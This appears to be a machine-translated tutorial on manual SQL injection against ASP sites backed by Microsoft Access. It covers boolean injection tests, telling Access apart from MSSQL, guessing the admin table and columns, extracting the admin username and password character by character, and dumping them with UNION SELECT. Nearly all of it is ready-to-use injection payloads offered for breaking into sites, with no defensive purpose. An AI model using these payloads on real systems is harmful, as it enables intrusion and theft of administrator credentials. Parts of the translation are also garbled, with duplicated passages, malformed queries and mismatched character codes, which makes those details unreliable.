Access manual injection notes

Www. xxx. comnews. asp? Id6 injection points determine whether there are two injections. The returned results are different. Are there injection www. xxx. comnews. asp? Id6and11www. xxx. comnews. asp? Id6and12 indicates that the database may not be tested due to local issues and (selectcount (*) frommsys

Http://www.xxx.com/news.asp? Id = 6 injection points determine whether there is injection two return different exist injection http://www.xxx.com/news.asp? Id = 6 and 1 = 1 http://www.xxx.com/news.asp? Id = 6 and 1 = 2 it is determined that the database may be a local problem and (select count (*) from msys

Http://www.xxx.com/news.asp? Id = 6
InjectionPoint

Determine whether there isInjectionTwo different responses existInjection
Http://www.xxx.com/news.asp? Id = 6 and 1 = 1

Http://www.xxx.com/news.asp? Id = 6 and 1 = 2

The database may not be tested due to a local problem.
And (select count (*) from msysobjects)> 0 (return access database with insufficient permissions)
And (select count (*) from sysobjects)> 0 (MSSQL database is returned normally)

Name of the table to be guessed (admin exists if the table is normal, and admin exists if the table is abnormal)

And exists (select * from admin)

If the returned result is correct and admin exists, we can enter one. The returned error does not exist.

Now let's guess the field
And exists (select username from admin)

And exists (select password from admin)

No error indicates that both fields do not exist.

Guess the username and password length

And (select top 1 len (username) from admin)> 0
And (select top 1 len (password) from admin)> 0

Guess the username and password content:
And (select top 1 asc (mid (username, 1, 1) from admin)> 97
And (select top 1 asc (mid (username, 1, 1) from admin) = 97
And (select top 1 asc (mid (username, 100) from admin) =
And (select top 1 asc (mid (username, 109) from admin) =
And (select top 1 asc (mid (username, 105) from admin) =
And (select top 1 asc (mid (username, 5, 1) from admin) = 110

97 100 109 105 110 admin

------------------------------------------------------
And (select top 1 asc (mid (password, 1, 1) from admin) = 52
And (select top 1 asc (mid (password, 2, 1) from admin) = 54
And (select top 1 asc (mid (password, 3, 1) from admin) = 57
And (select top 1 asc (mid (password, 4, 1) from admin) = 56
And (select top 1 asc (mid (password, 5, 1) from admin) = 48
And (select top 1 asc (mid (password, 6, 1) from admin) = 100
And (select top 1 asc (mid (password, 7,1) from admin) = 51
And (select top 1 asc (mid (password, 8, 1) from admin) = 50
And (select top 1 asc (mid (password, 9,1) from admin) = 99
And (select top 1 asc (mid (password, 10, 1) from admin) = 48
And (select top 1 asc (mid (password, 11,1) from admin) = 53
And (select top 1 asc (mid (password, 12, 1) from admin) = 53
And (select top 1 asc (mid (password, 13, 1) from admin) = 57
And (select top 1 asc (mid (password, 102) from admin) =
And (select top 1 asc (mid (password, 15, 1) from admin) = 56
And (select top 1 asc (mid (password, 16,1) from admin) = 32

52 54 57 101 56 48 100 51 50 99 48 53 57 102 56 32
The password obtained by 469e80d32c0559f8 md5 is admin888.
========================================================== ==================
(2) Joint query of exposed management accounts and passwords

First, use order by to display the number of fields, and then:

Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 from admin

Syntax: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 indicates the column length.
From admin Query

After running, two to three numbers are displayed. For example, if the number is 4 or 12, modify the substatement (that is, modify the substatement to the column name in 4 or 12, and change it to the red part ):
Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 3, usermane, 5, 6, 7, 8, 9, 10, 11, password, 13, 14, 15 from admin

In this way, the Administrator account and password can be disclosed. Of course, you can also blow up your account first:

Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 3, username, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 from admin

Password cracking:
Http://www.xxx.com/news.asp? Id = 6 and 1 = 2 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, password, 15 from admin